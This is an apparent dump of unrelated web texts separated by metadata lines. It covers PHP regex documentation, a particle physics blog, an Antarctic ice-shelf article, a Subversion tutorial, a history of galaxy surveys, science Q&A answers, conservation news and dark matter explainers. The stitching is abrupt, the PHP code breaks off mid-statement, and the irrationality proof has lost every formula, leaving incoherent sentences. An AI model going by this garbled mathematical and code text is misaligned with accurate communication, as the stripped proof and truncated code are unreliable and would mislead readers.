For instance, one of my rewrite rules for a project I'm working on is "replace o with ö if o is the next to last vowel and even numbered (counting left to right)" So, an example is: heabatoik would become heabatöik (o is the next to last vowel, as well as the 4th vowel) habatoik would not change (o is the next to last vowel, but is the 3rd vowel) $str = preg_replace( Subpatterns are delimited by parentheses (round brackets), which can be nested. Marking part of a pattern as a subpattern does two things: It localizes a set of alternatives. For example, the pattern cat(aract|erpillar|) matches one of the words "cat", "cataract", or "caterpillar". Without the parentheses, it would match "cataract", "erpillar" or the empty string. It sets up the subpattern as a capturing subpattern (as defined above). When the whole pattern matches, that portion of the subject string that matched the subpattern is passed back to the caller via the ovector argument of pcre_exec(). Opening parentheses are counted from left to right (starting from 1) to obtain the numbers of the capturing subpatterns. For example, if the string "the red king" is matched against the pattern the ((red|white) (king|queen)) the captured substrings are "red king", "red", and "king", and are numbered 1, 2, and 3. The fact that plain parentheses fulfill two functions is not always helpful. There are often times when a grouping subpattern is required without a capturing requirement. If an opening parenthesis is followed by "?:", the subpattern does not do any capturing, and is not counted when computing the number of any subsequent capturing subpatterns. For example, if the string "the white queen" is matched against the pattern the ((?:red|white) (king|queen)) the captured substrings are "white queen" and "queen", and are numbered 1 and 2. The maximum number of captured substrings is 99, and the maximum number of all subpatterns, both capturing and non-capturing, is 200. As a convenient shorthand, if any option settings are required at the start of a non-capturing subpattern, the option letters may appear between the "?" and the ":". Thus the two patterns match exactly the same set of strings. Because alternative branches are tried from left to right, and options are not reset until the end of the subpattern is reached, an option setting in one branch does affect subsequent branches, so the above patterns match "SUNDAY" as well as "Saturday". It is possible to name a subpattern using the syntax (?P<name>pattern). This subpattern will then be indexed in the matches array by its normal numeric position and also by name. PHP 5.2.2 introduced two alternative syntaxes (?<name>pattern) and (?'name'pattern). Sometimes it is necessary to have multiple matching, but alternating subgroups in a regular expression. Normally, each of these would be given their own backreference number even though only one of them would ever possibly match. To overcome this, the (?| syntax allows having duplicate numbers. Consider the following regex matched against the string Sunday: Here Sun is stored in backreference 2, while backreference 1 is empty. Matching yields Sat in backreference 1 while backreference 2 does not exist. Changing the pattern to use the (?| fixes this problem: Using this pattern, both Sun and Sat would be stored in backreference 1.
<urn:uuid:7a42c6ae-b51b-4c06-82bd-562ad06ca0d8>
3.140625
779
Documentation
Software Dev.
52.347729
Last week, I got my copy of the 2012 Particle Data Group Review of Particle Physics booklet — which, along with its heavy, 1000-page full-length counterpart, we simply call “the PDG.” My very first copy, during my first months at CERN in the summer of 2003, is a vivid memory for me. Here was a book with almost everything you want to know, about every particle ever discovered! It was like the book of dinosaurs I had when I was a kid, and I read it in exactly the same way: flipping to a random page and reading a few facts about, say, the charged kaon. My new copy of the PDG has inspired me to adapt this fun for non-experts. So each day, I’ll feature a new particle on Twitter; I’m @sethzenz, and the hashtag will be #ParticleOfTheDay. Since starting last week, I’ve featured the B0s meson, the pion, the kaon, the electron, and the Higgs. How long can I keep this up? That is, how many particles are there? Well, that depends on how you count. The Standard Model has 3 charged leptons, 3 neutrinos, 6 quarks, the photon, and the W, Z, and Higgs bosons. But then there’s all the antiparticles. Dark matter candidates. The graviton. I could even argue for taking 8 days covering all the gluon colors! (Don’t worry, I won’t.) But most of all, there’s all the composite particles — those that are made from a combination of quarks. There are a very large number of those, and there will always be more to find too, because you can always add more energy to the same combination of quarks. The point isn’t to be systematic. I might go back and be more specific. I might repeat. What I really want to do is find a particle each day that’s in the news or I can say something interesting about. Flipping at random through a book of particles turns out not to be the best way to learn particle physics; ultimately, I needed to learn the principles by which those particles are organized. But it is an interesting way to tell the story of particle physics: its history and how it’s done today. After all, the particles do come out of accelerators in a random jumble; it’s our job to organize them. Have an idea for the Particle of the Day, and what to say about it? Let me know!
<urn:uuid:72c59262-4f2e-4b62-bdda-b55f3f41a133>
2.953125
557
Personal Blog
Science & Tech.
70.446659
2012, Oceanography 25(3):202–203, http://dx.doi.org/10.5670/oceanog.2012.95 Adrian Jenkins | British Antarctic Survey, Natural Environment Research Council, Cambridge, UK Pierre Dutrieux | British Antarctic Survey, Natural Environment Research Council, Cambridge, UK Stan Jacobs | Lamont-Doherty Earth Observatory of Columbia University, Palisades, New York, USA Steve McPhail | National Oceanography Centre, Southampton, UK James Perrett | National Oceanography Centre, Southampton, UK Andy Webb | National Oceanography Centre, Southampton, UK Dave White | National Oceanography Centre, Southampton, UK In recent years, mass loss from the Antarctic Ice Sheet has contributed nearly 0.5 mm yr–1 to global mean sea level rise, about one-sixth of the current rate (Church et al., 2011). Around half of that contribution has come from accelerated draining of outlet glaciers into the southeast Amundsen Sea (Rignot et al., 2008), where the flow speed of Pine Island Glacier (PIG; Figure 1) in particular has increased by over 70%, to around 4 km yr–1, since the first observations in the early 1970s (Rignot, 2008; Joughin et al., 2010). The accelerations have been accompanied by rapid thinning of the glaciers extending inland from the floating ice shelves that form the glacier termini (Shepherd et al., 2002, 2004). One implication of these observed patterns of change is that the mass loss has probably been driven by changes in the rate of submarine melting of the floating ice shelves. The ubiquitous presence of warm Circumpolar Deep Water (CDW) on the Amundsen Sea continental shelf, at temperatures 3–4°C above the pressure freezing point, was first revealed during a 1994 cruise of RVIB Nathaniel B Palmer (Jacobs et al., 1996). Repeat observations at the Pine Island Ice Front made from the Palmer in 2009 showed that submarine melting of PIG had increased by 50% over the intervening 15 years despite a modest rise in the temperature of CDW of only about 0.1°C (Jacobs et al., 2011). While ice front observations were able to document those changes, the reason for the dramatic increase in submarine melting would have remained speculative while the ocean cavity beneath the approximately 65 x 35 km, fast-flowing, central part of the ice shelf remained a black box. Jenkins, A., P. Dutrieux, S. Jacobs, S. McPhail, J. Perrett, A. Webb, and D. White. 2012. Autonomous underwater vehicle exploration of the ocean cavity beneath an Antarctic ice shelf. Oceanography 25(3):202–203, http://dx.doi.org/10.5670/oceanog.2012.95. Church, J.A., N.J. White, L.F. Konikow, C.M. Domingues, J.G. Cogley, E. Rignot, J.M. Gregory, M.R. van den Broeke, A.J. Monaghan, and I. Velicogna. 2011. Revisiting the Earth’s sea-level and energy budgets from 1961 to 2008. Geophysical Research Letters 38, L18601, http://dx.doi.org/10.1029/2011GL048794. Jacobs, S.S., H.H. Hellmer, and A. Jenkins. 1996. Antarctic ice sheet melting in the southeast Pacific. Geophysical Research Letters 23:957–960, http://dx.doi.org/10.1029/96GL00723. Jacobs, S.S., A. Jenkins, C.F. Giulivi, and P. Dutrieux. 2011. Stronger ocean circulation and increased melting under Pine Island Glacier ice shelf. Nature Geoscience 4:519–523, http://dx.doi.org/10.1038/ngeo1188. Jenkins, A., P. Dutrieux, S.S. Jacobs, S.D. McPhail, J.R. Perrett, A.T. Webb, and D. White. 2010. Observations beneath Pine Island Glacier in West Antarctica and implications for its retreat. Nature Geoscience 3:468–472, http://dx.doi.org/10.1038/ngeo890. Joughin, I., B.E. Smith, and D.M. Holland. 2010. Sensitivity of 21st century sea level to ocean-induced thinning of Pine Island Glacier, Antarctica. Geophysical Research Letters 37, L20502, http://dx.doi.org/10.1029/2010GL044819. McPhail, S.D., M.E. Furlong, M. Pebody, J.R. Perrett, P. Stevenson, A. Webb, and D. White. 2009. Exploring beneath the PIG Ice Shelf with the Autosub3 AUV. Paper presented at Oceans 09 – Europe, Bremen, Germany, May 11–14, 2009, http://dx.doi.org/10.1109/OCEANSE.2009.5278170. Rignot, E. 2008. Changes in West Antarctic ice stream dynamics observed with ALOS PALSAR data. Geophysical Research Letters 35, L12505, http://dx.doi.org/10.1029/2008GL033365. Rignot, E., J.L. Bamber, M.R. van den Broeke, C. Davis, Y. Li, W.J. van de Berg, and E. van Meijgaard. 2008. Recent Antarctic ice mass loss from radar interferometry and regional climate modelling. Nature Geoscience 1:106–110, http://dx.doi.org/10.1038/ngeo102. Schoof, C. 2007. Ice sheet grounding line dynamics: Steady states, stability, and hysteresis. Journal of Geophysical Research 112, F03S28, http://dx.doi.org/10.1029/2006JF000664. Shepherd, A., D.J. Wingham, and J.A.D. Mansley. 2002. Inland thinning of the Amundsen Sea sector, West Antarctica. Geophysical Research Letters 29, 1364, http://dx.doi.org/10.1029/2001GL014183. Shepherd, A., D. Wingham, and E. Rignot. 2004. Warm ocean is eroding West Antarctic ice sheet. Geophysical Research Letters 31, L23402, http://dx.doi.org/10.1029/2004GL021106.
<urn:uuid:5c87e5a6-7de5-438a-b63d-68aae7e7dd08>
2.9375
1,445
Knowledge Article
Science & Tech.
83.590357
If and are two distinct rational numbers written in their lowest terms, then , which implies that , which implies that . Therefore, if is a real number and we can find a sequence of rational numbers (in their lowest terms, with denominators tending to infinity) such that (which is equivalent to saying that ), then cannot be rational.♦ Loosely speaking, if you can approximate well by rationals, then is irrational. This turns out to be a very useful starting point for proofs of irrationality. Let us construct inductively a sequence of rationals that approximate . (This is not necessarily the best proof of the irrationality of but it gives an easy illustration of the technique.) We begin with , and observe that . If were , then we would have , so the "" at the end of this is our error term in the first approximation. Now suppose we have defined and in such a way that . Then set and . (The justification for this choice is that if were then would be too, as can easily be checked.) Then Thus, we have constructed a sequence of rationals , with denominators tending to infinity, such that for every . But from this we deduce that , and therefore that . Since To prove the irrationality of , we start with the power-series expansion: We then set to be . This is a fraction with denominator that divides . It differs from by Also, this difference is strictly positive and not zero. Therefore, , so is irrational. The two proofs given so far can easily be, and usually are, presented in other ways that do not mention the basic principle explained in the quick description. However, sometimes that basic principle plays a much more important organizational role: one is given a number to prove irrational, and one attempts to do so by finding a sequence of good rational approximations to . Another point is that if is irrational then such a sequence always exists: one can take the convergents from the continued-fraction expansion of . But this observation is less helpful than it seems, since for many important irrational numbers (such as ) there does not seem to be a nice formula for the continued-fraction expansion. The point of the method explained here is that it is much more flexible: any sequence of good approximations will do (and sequences are indeed known that prove the irrationality of ).
<urn:uuid:fed96f57-f109-4469-89ba-dc72430980bf>
3.5
482
Academic Writing
Science & Tech.
43.828314
In this case, "o" means object. It's an attempt at using the "systems" variation of hungarian notation. There are two types of hungarian: Systems and Apps. Systems uses a prefix to identify the type of data stored. For example, the "i" in iCounter would indicate that the variable was an integer. Apps hungarian took a completely different approach and specifies that the prefix should indicate the purpose of the data. For example, the "rw" in rwPosition would mean row. The windows api used Systems hungarian. This led to a large number of other programmers also using it. The unfortunate aspect is that when changes were made to the api, they kept the old variable names even when the actual data type changed. This led to large amounts of confusion as to what data type a parameter to a given API function should be passed. Especially around various handles. In the .Net coding guidelines, MS explicitly states that hungarian shouldn't be used. The reality is that they are talking about "Systems" hungarian; which I 100% agree with. "Apps" hungarian on the other hand has a ton of uses as you are describing the data, not the type. At the end of the day just remove the "o". It adds nothing to the program. Oh, and for interesting reading, check out Joel's take on this at: http://www.joelonsoftware.com/articles/Wrong.html
<urn:uuid:78e73d65-3bd4-4bfa-99b3-848d64e1b5e5>
3.109375
305
Q&A Forum
Software Dev.
59.586538
4.2. Getting Files into the Repository Now that you have created the empty repository, it's time to get the project files into it. To do this, you need to put the files into a basic directory structure for the repository, and then import the entire structure. It would be possible to make that directory structure as simple as a single directory named hello_world , with hello.c and Makefile inside. In practice, though, this isn't a very good directory structure to use. If you recall from the previous chapter, Subversion does not have any built-in support for branches or tags, but instead just uses copies. This proves to be a flexible way to handle branches and tags, but if they're just copies, there is no set means for identifying what files are branches and what files are on the main source trunk. The recommended way to get around this missing information is to create three directories in your repository, one named branches , another named tags , and a third named trunk . Then, by convention, you can put all branched versions of the project into the branches directory and all tags into the tags directory. The trunk directory will be used to store the main development line of the project. With large, complex repositories, there are a number of different ways you can set up the directories for the trunk, branches, and tags, which can accommodate multiple projects in one repository, or facilitate different development processes. Because our test project is simple though, we'll keep the repository simple and place everything at the top level of the repository. So, to get everything set up, you first need to create an overall directory for the repository, called repos . Then, set up trunk , branches , and tags directories under that, and move the original source files for the project into the trunk directory. $ mkdir repos $ mkdir repos/trunk $ mkdir repos/branches $ mkdir repos/tags $ ls repos branches tags trunk $ mv hello.c repos/trunk/ $ mv Makefile repos/trunk/ $ ls repos/trunk/ Makefile hello.c After the directories are created and filled, the only thing left to do is import the directory into our repository. This is done using the import command in the svn program. $ svn import --message "Initial import" repos file:///home/bill/repositories/my_repository Adding repos/trunk Adding repos/trunk/hello.c Adding repos/branches Adding repos/tags Committed revision 1. --message "Initial import" option in the Now that the repository structure has been imported, you can delete the original files. Everything should now be stored in the database, and ready for you to check out a working directory and begin hacking. 4.3. Creating a Working Copy The working copy is where you make all of your changes to the files in the repository. You check out the working copy directory by running the svn checkout command, and it contacts the repository to retrieve a copy of the most recent revision of all the data in your repository. A local directory tree that matches the tree inside the repository will be created, and the downloaded working directory files will be placed in there. $ svn checkout file:///home/bill/my_repository/trunk my_repos_trunk A my_repos_trunk/hello.c A my_repos_trunk/Makefile Checked out revision 1. As you can see, Subversion has checked out the directory from your repository, creating a local working copy directory with the Now, if you look closely at your new working copy, you can see that Subversion also has placed one additional directory in the directory that you checked out. $ ls my_repos_trunk Makefile hello.c $ ls -A my_repos_trunk .svn Makefile hello.c When you check out a repository, Subversion places a directory in every directory of the repository. Inside these directories, Subversion places a wide variety of metadata about the working directory, including what repository the working directory comes from and what revisions of each file have been checked out. It also stores complete pristine versions of the last checked-out revision of each file in the working directory. This allows Subversion to provide you with
<urn:uuid:48c50c81-0e2f-4550-9f3e-7876f308d1b6>
2.96875
918
Tutorial
Software Dev.
40.124195
Since the time of the Herschels, surveys of bright galaxies have provided the foundations upon which much of observational cosmology rests. A history of the major surveys extends from William and John Herschel in the first half of the 19th century, through William Parsons, the third Earl of Rosse, to Isaac Roberts, Dreyer (1888), Keeler (1900), Perrine (1904), Hardcastle (1914), Fath (1914), Pease (1917), Curtis (1918), Hubble (1922, 1926), and into modern times. The publication of the New General Catalog by Dreyer in 1888 and its two Index Catalog supplements in 1895 and 1908 marks the beginning of reference works that are still in regular use. Photographic studies of the brighter Herschel galaxies using large telescopes began with Keeler's survey, employing the Lick 36-inch Crossley reflector, which culminated in the historic Lick Observatory Publications 13, 1918, by Curtis. Photographic surveys at Mount Wilson were begun by Ritchey in 1909 and by Pease when the long-focal-length 60-inch reflector (hereafter W60) was completed. In two remarkable summary articles by Pease (1917, 1920), a number of features of famous nearby galaxies were illustrated for the first time. The Mount Wilson photographic survey was continued by Hubble in the early 1920's using the W60 and the newly completed Hooker 100-inch (W100) reflector, which had been put into routine operation in 1919. The completion of this early work led Hubble (1922, 1926) to the formulation of the system of galaxy morphology that is the foundation of the modern standard method of classification. Hubble's 1926 paper contains the classification of 400 of the brightest NGC galaxies taken from the Hardcastle (1914) listing, which until 1932 was the most homogeneous catalog in existence, based, as it was, on the Franklin-Adams plates taken in the early years of the century and covering the entire sky. The Harvard survey of 1246 bright galaxies was published by Shapley and Ames in 1932. This catalog (hereafter called the SA) has a fair degree of homogeneity within its magnitude limit at mpg 13m.2. Furthermore, the uniform way in which Shapley and Ames compiled the data from both hemispheres using new plate material, produced for the first time an approximation to a magnitude-limited sample. The SA became the basic listing of bright galaxies and has played a major role in studies of galaxies in the local region. It has only recently been supplemented by the first and second editions of the Reference Catalog of Bright Galaxies (de Vaucouleurs and de Vaucouleurs 1964, for RC1; de Vaucouleurs, de Vaucouleurs, and Corwin 1976, for RC2). Following Hubble's initial work, the Mount Wilson photographic survey was continued through the 1930's principally by Hubble, Baade, and Humason, with a primary aim of obtaining large-scale plates of all galaxies listed in the SA north of = -15°. The purpose was to classify the galaxies for morphological studies, a process which, as is now known, leads directly to the central problem of galaxy formation and evolution. The survey, stopped between 1940 and 1945 during World War II, resumed in 1946, and was transferred to Palomar when the Hale 5-meter telescope (P200) was put into operation in 1949. Beginning in 1974, the project was extended to the south using plates taken at the Las Campanas Observatory, Chile, first with the Swope 1-meter reflector (C40), and after 1977 with the du Pont 2.5-meter reflector (C100). Results from the southern survey to 1979 are given elsewhere (Sandage and Brucato 1979, 1981). In parallel with Hubble's work to obtain large-scale plates of the bright SA galaxies, Humason at Mount Wilson and Mayall at Lick began a program in the 1930's to measure redshifts in the northern sector of the SA. By 1956, they had obtained redshifts for all SA galaxies brighter than mpg = 11m.7 north of = -30°, and for many fainter galaxies. The Humason-Mayall redshift catalog (Humason, Mayall, and Sandage 1956) is 63% complete for all listed SA galaxies north of -30°. Since 1956, a number of radio and optical observers have combined efforts to complete the redshift coverage for nearly the entire Shapley-Ames catalog in both hemispheres. Redshift values now exist for all but six SA galaxies; and many of the earlier optical values have been improved through 21-cm observations.
<urn:uuid:7fdcfa53-19c0-4d7d-8688-5db1cdcf9dcb>
3.421875
981
Knowledge Article
Science & Tech.
46.231375
Blue Electron Beam Name: Justin S. When using the Leybold q/m Apparatus, why is the beam of electrons coming out of the electron gun blue? I cannot say for certain, because I do not have the apparatus. I can however, think of two very likely possibilities. One, of course, is that the source of electrons is also a source of blue light. To make a material emit electrons, it must receive extra energy. One way to do this is through heat. If a filament is heated to make it emit electrons, it may also be hot enough to glow blue. A less likely possibility is electrons colliding with air molecules, and then blue photons being released during the collisions. For this to be true, there would have to be a huge number of electrons all losing the same amount of energy when crashing into air molecules. One way to determine whether a blue-glowing filament is the cause is with a focusing mirror. Get a concave mirror with a focal length of several centimeters (8-12cm). Place the mirror at an angle of about 45 degrees in the beam, at least twice the focal length from where the electrons are produced. Hold up a paper in the reflected light, about two focal lengths from the mirror. If you can see a blue filament projected on the paper, you are seeing the source of the blue light. You may have to adjust the paper's location to refine the focus. Dr. Ken Mellendorf Illinois Central College It sounds like emission of light from excitation of the gas in the apparatus by the electron beam, but I am not sure what gas is in the Click here to return to the Physics Archives Update: June 2012
<urn:uuid:e4bd341a-dc97-4931-94d1-7ec6fc67f6e5>
3.46875
377
Q&A Forum
Science & Tech.
56.729561
Sea Gull Behavior We are 300 miles from the east coast on Claytor Lake in VA. Lately we have seen thousands of sea gulls on the water and flying around. What are they doing so far inland, where do they go at night,and where do they go from here. I'm from Illinois, so I can't answer specific questions. However, the term "sea gull" is so vague as to be meaningless. There are several common species of gulls and quite a few less common, and many of them range far from the "sea." In the Chicago area ring-billed gulls are found on Lake Michigan and far inland on and around ponds, lakes, shopping centers - wherever they can scavenge for food. On the east coast, according to the range maps in the Peterson field guide, ring-billed and herring gulls winter along the Virginia coast and herring gulls breeding range is "expanding." This edition of the guide was published in 1980. Gulls are scavengers and will go wherever there is food. Click here to return to the Zoology Archives Update: June 2012
<urn:uuid:e4790ed3-8249-4632-aaca-e5b590548dd8>
3.109375
246
Knowledge Article
Science & Tech.
63.557913
Weekly Problem 27 - 2013 Can you find the area of a parallelogram defined by two vectors? The seven pieces in this 12 cm by 12 cm square make a Tangram set. What is the area of the shaded parallelogram? Four rods, two of length a and two of length b, are linked to form a kite, as shown in the diagram. The linkage is moveable so that the angles change. What is the maximum area of the kite? Now suppose the four rods are assembled into a linkage which makes a parallelogram. What is the maximum area of this
<urn:uuid:0e6d0a69-bc16-4a82-a7b6-5e0d6a20b85b>
3.234375
131
Q&A Forum
Science & Tech.
70.28
|11 Nov 2010|| Blueprint to protect the Future of Australia's oceans revealed Conservation Biology paper - assessing the capacity of Australia's Protected areas to protect endangered species A new paper has come out in Conservation Biology entitled The capacity of Australia’protected-area system to represent threatened species. by James Watson et al. See thepaper in full at http://dx.doi.org/doi:10.1111/j.1523-1739.2010.01587.x Picked up by the media as follows: Australasian Science Magazine: 1. February 2010: Will REDD payments save threatened species?, David Salt 2. February 2010: Is conservation too conservative, Hugh Possingham 3. March 2010: Real conservation targets, Hugh Possingham 4. April 2010: A world of biodiversity challenges – so different yet so similar, Hugh Possingham 5. May 2010: The case for biodiversity offsets, Phil Gibbons 6. July 2010: What do greenies want?, Hugh Possingham 7. September 2010: The news is not good..., David Salt 8. October 2010: Australia’s acoustic environmental accounts, Hugh Possingham 9. November 2010: Does fishing kill fish?, Hugh Possingham |29 Oct 2010| |31 Aug 2010||Fantastic world media for Croc work at UQ, involving AEDA's Matthew Watts An article from Notes and News in the Bulletin of the British Ecological Society 2010 details tremendous media coverage for research done by UQ's Dr Hamish Campbell & Dr Craig Franklin. It is also significant for AEDA, as our own Matt Watts played an important part in the research. A press release from the Bulletin has apparently had more coverage than "any other jounal paper in the past 10 years, with more than 325 individual items of coverage in the UK, US, [and] Australia in print and on TV and radio". The Bulletin estimates that the total audience could be over 15 million!! Well done Hamish, Craig and Matt! Full article HERE and see the YouTube coverage too. |1 July 2010|| A new paper on improving protected area networks was published this morning in Nature. We show that dramatic improvements to the performance of a protected area system can be made by replacing a small number of poorly performing areas with new ones that are more cost-effective for conservation. This can be done without spending any more money, by trading up poor quality sites with those that achieve more for conservation. See the paper at: http://dx.doi.org/10.1038/nature09180 Comment on this in the Economist |19 June 2010- The Age|| Professor Hugh Possingham's [UQ, AEDA Director] idea is simple - it is called the endangered species lottery. First the federal government creams off $20 million from taxes on gambling revenue as a prize. Then the names of Australian endangered species are written on balls and put in a barrel. On Melbourne Cup day the federal environment minister draws a ball from the barrel live on television just before the big race. Landholders who have populations of the winning species on their property are given a slice of the $20 million pie, with more money apportioned for larger populations. Possingham, a world-renowned ecologist and mathematician at the University of Queensland, says the lottery would encourage landowners to look after and even increase these populations of endangered species in the hope of winning money ... READ ON |15 June 2010|| Nature News - New UN science body to monitor biosphere Representatives from close to 90 countries gathering in Busan, Korea, this week, have approved the formation of a new organization to monitor the ecological state of the planet and its natural resources. Dubbed the Intergovernmental Science-Policy Platform on Biodiversity and Ecosystem Services (IPBES), the new entity will likely meet for the first time in 2011 and operate much like the Intergovernmental Panel on Climate Change (IPCC). In essence, that means the IPBES will specialize in "peer review of peer review", says Nick Nuttall, a spokesman for the United Nations Environment Programme, which has so far hosted the IPBES birth process. Read the article HERE |14 June 2010||The Age - Safeguarding our species Declared the `Year of Biodiversity' by the United Nations, 2010 provides an opportunity to celebrate life on earth and to safeguard biodiversity, the variety of life. Nerissa Hannink reports on projects projects at the University of Melbourne that reevaluate the number of species on the planet and explore the most innovative ways of keeping them alive. Work by Dr Tracy Rout & Dr Michael McCarthy from Uni Melbourne is discussed. Paper discussing cross-boarder conservation, an AEDA international collaboration, gets lots of press. The paper: Kark, S., N. Levin, H. S. Grantham and H. P. Possingham, (2009). "Between-country collaboration and consideration of costs increase conservation planning efficiency in the Mediterranean Basin." Proceedings of the National Academy of Science of the USA 106(36): 15368-15373 (web pdf or email for reprint) |13 December 2009||Science Alert .com features our article on Climate Change - Twenty years on, what don't we know? by Phil Gibbins & Adam Felton| |30 November 2009||Oscar Ventor in an article on REDD carbon trading scheme published in Time Magazine Banking on Trees| |26 November 09||Hugh interviewed at Conservation Bytes| |24 November 09|| ABC NewsMail - morning edition - WEB SITE An Australian biologist says climate change is speeding up the creation of new species through the merging of habitats. Drs James Watson and Liana Joseph were commissioned by the Department of Environment, Water, Heritage and the ARts (DEWHA) to prodice an independent report on the recent annd ongoing Timor Sea oil slick. More than 20 different media outlets have picked up on this. Click on any one of the links below to go to media reports: |10 November 2009||BBC One Minute News - Koalas 'could face exctinction' - report with short video of Hugh and Deb Tabart (Aust Koala Foundation) speaking about the plight of koalas| |October 09||NATIVE BIRD POPULATIONS DECLINING RAPIDLY: ABC 7:30 REPORT, including comments on Australia's National Biodiversity Strategy 2010-2020.| |October 09||Hugh interviewed by a French journalist in Australia reporting for Le Monde national newspaper (apparently the French equivalent of the NYT or The Guardian) about marine bioregional planning, and Carissa Klein by La Croix. Sylvaine and Iadine did a bit of translating of Carissa’s interview (see link below) and basically it says that MPA are very important and have been successful in Australia. It also discusses the new reserves system that Canberra will invest in, mentioning Peter Garrett and GBRMPA, and says that Canberra signed an agreement with the six countries from the coral triangle to help them protect their pretty-beautiful marine areas. However, Iadine thought the journalist was playing on words “… comparing marine areas to “beautes marines” e.g. beautiful things from the sea (mermaids?). He’s trying to make us dream. There must be some king of advertising for travelling on the next page” and in fact she was right! Yes, Sylvaine found an add for holidays on the next page of the paper! For anyone who can read French, the article itself An AEDA paper published in Conservation Letters on Reduced Emissions from Deforestation and forest Degradation (REDD) and biodiversity conservation hits 65 media outlets and radio. Lead by Oscar Venter, an AEDA PhD student (www.aeda.edu.au), researchers from around the world have determined that REDD could offset deforestation if used in cost-efficient areas, such a Kalimantan. Oscar was interviewed by Phil Kafcaloudes and Adelaine Ng from the Breakfast Club on Radio Australia on 10 June 2009 - LISTEN HERE Media outlets from all around the world have reported on this paper, including: BBC; Scientific American; New York Times; Los Angeles Times; Washington post; Reuters; The Jakarta Post; Associated Press; China Post; CNBC; Science Daily; The Huffington Post; CBS News; Chicago Tribune; Jakarta Globe; Indonesia Post; Kansas City Star; The Boston Globe; Yahoo news; Taiwan news; Southern Ledger; SeattlePI; WCTV; The Monteray Herald; Seattle times; San Francisco Chronicle; Newsday; Baltimore Sun; Forbes; Agence France Presse-English; Agencia EFE (Spain); Reuters—Portuguese; RedOrbit; WNYT News Channel 13; Star Tribune; Salem Radio Network News; ClearNet Business (NZ); NewsER; Fort Mill Times; First Science; FAO United Nations: Forest News; WTOP 103.5; Intell Asia; Journal Gazette; The Daily Reflector; The Star; Statesman; World Environment News; Fox 13 Now; Straits Times; Environmental News Network; KSTP News; The News Tribune; KSL News Radio; Daily Advance; Science Daily; Sun Sentinal; AL; Sulekha; Morning Star; Planet Ark; News Guide; Terra Daily; PhysOrg, Mongabay.com One reason for the rapid loss of species-rich tropical forests is the high opportunity costs of forest protection. In Kalimantan (Indonesian Borneo), the expansion of high-revenue oil palm (Elaeis guineensis) plantations currently threatens 3.3 million ha of forest. We estimate that payments for Reduced Emissions from Deforestation and forest Degradation (REDD) could offset the costs of stopping this deforestation at carbon prices of US$10–33 per tonne of CO2, or $2–16 per tonne if forest conservation targets only cost-efficient areas. Forty globally threatened mammals are found within these planned plantations, including the Bornean orangutan (Pongo pygmaeus) and Borneo pygmy elephant (Elephas maximus borneensis). Cost-efficient areas for emissions reductions also contain higher-than-average numbers of threatened mammals, indicating that there may be synergies between mitigating climate change and conserving biodiversity. While many policy and implementation issues need clarification, our economic assessment suggests that REDD could offer a financially realistic lifeline for Kalimantan’s threatened mammals if it is included in future climate agreements. Los biólogos reclaman una red de ríos protegidos - Virgilio Hermosa and Simon Linke. Bikini corals recover from atomic blast Half a century after the last earth-shattering atomic blast shook the Pacific atoll of Bikini, the corals are flourishing again. Some coral species, however, appear to be locally extinct. Read the full report by Zoe Richards from JCU and Maria Beger, UQ & AEDA
<urn:uuid:bfd304d6-555c-44b4-bbef-08f4f2f98a6a>
2.796875
2,325
Content Listing
Science & Tech.
42.012942
What is a gas bladder? If you have found a strange balloon-like object washed up on the beach, you may be looking at a fish's gas bladder. The images show a gas bladder found by P. Merrick on Avoca Beach in January 2005. It is the gas bladder from a Porcupinefish (often called Spiny Pufferfish or Burrfishes). The gas bladder (also called a swim bladder) is a flexible-walled, gas-filled sac located in the dorsal portion of body cavity. It controls the fish's buoyancy and in some species is important for hearing. Most of the gas bladder is not permeable to gases, because it is poorly vascularised (has few blood vessels) and is lined with sheets of guanine crystals. Spiny Pufferfish gas bladders are not commonly encountered. Only a few examples of Porcupinefish gas bladders have been brought to the Australian Museum for identification during the last twenty years. Mark McGrouther , Collection Manager, Ichthyology
<urn:uuid:8c4e680e-3216-4dd5-85f4-bed4c6060102>
3.4375
213
Knowledge Article
Science & Tech.
52.653696
In the 1970s, an astronomer called Vera Rubin was measuring the velocities of stars in other galaxies and noticed something strange: the stars at the galaxies' edges moved faster than had been predicted. To reconcile her observations with the law of gravity, scientists proposed that there is matter we can't see and called it dark matter. Physicists are racing to find subatomic particles that could be the missing dark matter, which is thought to make up about 26% of the energy density of the Universe. Image: A computer-generated image of dark matter's potential distribution across millions of light years of space Invisible matter helps to hold the Universe together. BBC News reports from Boulby mine. The particle detectors used for the UK Dark Matter Collaboration experiment are housed in a mine deep under the North Yorkshire Moors. The BBC's David Shukman finds out what the scientists are hoping to learn. Dark matter is measured with gravitational lenses. Hubble Space Telescope images provide evidence of dark matter's existence. Light from distant galaxies is bent by a gravitational lens created by the dark matter's mass in nearby galaxies. Scientists hunt for elusive particles in a Yorkshire mine. Professor Tim Sumner explains how he hunts for elusive dark matter particles in Boulby mine in Yorkshire. Patrick Moore and his guests discuss galaxies. Sir Patrick Moore and his guests explain what galaxies are and discuss some of their interesting features. Scientists are puzzled by missing matter. In the 1970s, Professors James Peebles and Jeremiah Ostriker's computer model simulations of galaxies suggested that there are large amounts of unaccounted for matter in the Universe. However, their ideas did not gain wider acceptance until Vera Rubin's measurements of the speeds of stars in galaxies also suggested that there is missing matter, which is now known as dark matter. ["The size and mass of galaxies and the mass of the universe" copyright Ostriker and Peebles-The Astrophysical Journal 193 / "Dark Matter and the origin of galaxies and globular star clusters" copyright Peebles - The Astrophysical Journal 277: 470-477] In astronomy and cosmology, dark matter is a type of matter hypothesized to account for a large part of the total mass in the universe. Dark matter cannot be seen directly with telescopes; evidently it neither emits nor absorbs light or other electromagnetic radiation at any significant level. Instead, its existence and properties are inferred from its gravitational effects on visible matter, radiation, and the large-scale structure of the universe. According to the Planck mission team, and based on the standard model of cosmology, the total mass–energy of the universe contains 4.9% ordinary matter, 26.8% dark matter and 68.3% dark energy. Thus, dark matter is estimated to constitute 84.5% of the total matter in the universe. Dark matter came to the attention of astrophysicists due to discrepancies between the mass of large astronomical objects determined from their gravitational effects, and the mass calculated from the "luminous matter" they contain: stars, gas and dust. It was first postulated by Jan Oort in 1932 to account for the orbital velocities of stars in the Milky Way, and by Fritz Zwicky in 1933 to account for evidence of "missing mass" in the orbital velocities of galaxies in clusters. Subsequently, many other observations have indicated the presence of dark matter in the universe, including the rotational speeds of galaxies by Vera Rubin, in the 1960s–1970s, gravitational lensing of background objects by galaxy clusters such as the Bullet Cluster, the temperature distribution of hot gas in galaxies and clusters of galaxies, and more recently the pattern of anisotropies in the cosmic microwave background. According to consensus among cosmologists, dark matter is composed primarily of a not yet characterized type of subatomic particle. The search for this particle, by a variety of 